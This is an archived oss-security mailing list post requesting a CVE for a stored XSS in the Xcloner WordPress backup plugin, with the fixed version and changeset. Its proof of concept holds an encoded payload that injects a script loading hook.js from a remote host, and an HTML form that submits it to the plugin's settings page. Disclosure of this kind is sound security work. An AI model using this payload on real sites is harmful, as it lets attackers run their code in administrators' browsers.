Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 27 Jul 2016 02:35:46 +0000
From: limingxing <limingxing@....cn>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: CVE request : a stored XSS in Xcloner for wordpress

Hi

     I found a stored XSS in Xcloner for wordpress.  The XSS filter can 
be bypass.

     Here is the plugin page
     https://wordpress.org/plugins/xcloner-backup-and-restore/

     PoC

     In the "Corn setting" page(URL is 
"http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config"), 
set the "Backup name" (corn_bname) like 
"1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on"

     <html>
         <form 
action="http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config" 
method="post">
             <input type="hidden" name="cron_bname" 
value="1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on" 
/>
             <input type="submit" name="submit">
         </form>
     </html>


     Fix way
     Update to version 3.1.5

     Change

     https://plugins.trac.wordpress.org/changeset/1456784


     Could you assign a CVE ID for it?

Chen Ruiqi
Codesafe Team

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ